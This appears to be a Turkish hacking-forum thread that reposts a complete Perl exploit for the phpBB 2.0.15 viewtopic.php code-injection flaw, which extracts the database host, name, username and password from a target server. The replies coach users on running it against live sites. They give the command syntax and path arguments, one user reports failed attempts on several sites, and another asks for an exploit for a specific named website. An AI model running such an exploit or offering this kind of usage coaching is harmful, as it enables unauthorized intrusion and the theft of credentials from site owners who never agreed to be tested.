Php2.0.15 Db, Username , Pass Veren Bir Exploit
-
#!/usr/bin/perl
# tested and working /str0ke
# ********************************************************************
# **********************************************************************
# **** **
# *** ****** ******************* **
# *** *** **** *********************** **
# *** *** **** **** * *** ***** **
# *** *** *** *** *** * ** ** ** **
# *** *** *** ** ** ** ** **
#*** *** *** *** ** ** ***** **
#** *** *** **** ** ** ** **
#** *** *** *** ******* ******* ** *** ** **
#** *** *** *** ** *** *** ** ** ** ** **
#** *** *** *** ** *** *** *** ***** **
#** *** *** *** ** *** *** **
#** **** *** **** *** *** **
#** ******* **** ******** *********************************** **
#** *** **
#** *** **
#** **
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability **
#** This exploit gives the user all the details about the database **
#** connection such as database host, username, password and **
#** database name. **
#** **
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 **
#** **
#** Greetings to GvR, Jumento, PP, CKrew & friends **
#** **
#*****************************************************************************
# ***************************************************************************use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}# milw0rm.com [2005-07-03]
exploit www.milw0rm.com 'dan aLınmıstır
perl 15.pl www.siteadi.com /forumyolu/ 8 veya 20
eğer acık Varsa
sending expLoit ok
database :
database name :
user name:
passsword:forum siteSi siZin
daha once bu exLoit verildi ama bu yeni günceLLenmiŞ
-
iyide bunu nereye yazcaz
-
expLoit nasıL kuLLanıLır daha onceden veriLmişti. ordan bakın
-
Perl kurman lazım bilgisayarına.Perl kurduktan sonra c ye düş ordan veya işte perl nerede kuruluysa o klasöre gel "perl 15.pl www.siteadi.com /forumyolu/ 8 veya 20" yaz okedir,zaten açıkması olacaktır.Aşağıdaki kodu 15.pl olarak kaydedeceksin veya ne istersen öyle kaydet
-
beyler ya ben exploit aciklarini bir turlu bulamiom sitelerde exploit acigi warmi die arayan program warmi. bide phpbb 2.0.15 exploit denedim birkac sitede connectin [ok] sending exploit failed cikio bu sitede acik olmadinin gösterio sanirim ??
-
exploit i calistirinca soyle bi sey cikti karsima?
G:\Perl\bin>php2.0.15.pl www.site.com/forum/20
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
Usage:
phpbbSecureD.pl SERVER DIR THREADID COOKIESTRINGSERVER - Server where PhpBB is installed.
DIR - PHPBB directory or / for no directory.
THREADID - Id of an existing thread.
COOKIESTRING - Optional, cookie string of the http request.
Use this when a thread needs authentication for viewing
You can use Firefox in combination with "Live HTTP
Headers" to get this cookiestring.Example 1 (with cookiestring):
phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A
%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7
D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09"Example 2 (without cookiestring):
phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 -
DeAdPaN bunu yazdı:
exploit i calistirinca soyle bi sey cikti karsima?
G:\Perl\bin>php2.0.15.pl www.site.com/forum/20
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
Usage:
phpbbSecureD.pl SERVER DIR THREADID COOKIESTRINGSERVER - Server where PhpBB is installed.
DIR - PHPBB directory or / for no directory.
THREADID - Id of an existing thread.
COOKIESTRING - Optional, cookie string of the http request.
Use this when a thread needs authentication for viewing
You can use Firefox in combination with "Live HTTP
Headers" to get this cookiestring.Example 1 (with cookiestring):
phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A
%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7
D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09"Example 2 (without cookiestring):
phpbbSecured.pl 192.168.168.123 /PHPBB/ 20
Sana diorki 2 seceneğin war şimdi eğer saldıracağın sitenin www.phpbb.com olduğunu war sayarsak şöle yapacaksın
exploitininadı.pl www.phpbb.com /phpbb/ 20 şimdi burda exploitinin adı dediği şey dosyaya verdiğiniz isim,buraya kadar problem yok dieri sitenin adı /phpbb/ dediğimiz yerde sitenin forumun hangi klasör olduğudur eğer sitenn forumuna www.asdcf.com/forum olarak giriyorsanız olarayı /forum/ yapacaksınız 20 dediğide konu id si thread olması önemli konunun
istersen bunun sonuna cookie nide koyabilirsin dior ne fark war bilmiyorum ama üstekinin aynısını yapın yanına cookie değerinizi yazın...NOT!: www.siteadı.com dan sonra boşluk war www.siteadı.com /forum/ (boşluk)20 gibi...Dakkat edin yoksa olmaz.
-
site ismi yerine ip yazinca biseyler yapmaya basliyo sanirim
tesekkur ederim saolun
-
2.0.10 ve 2.0.15 benim sitede ise yaramadi malesef
yine de tesekkur ederim katkilariniz icin
www.ttmetal.com a bi bakip ona uygun exploit bulabilirseniz sevinirim
cok tarattim ama bulamadim
-
helal olsun exploiti derleyene tesekkurler...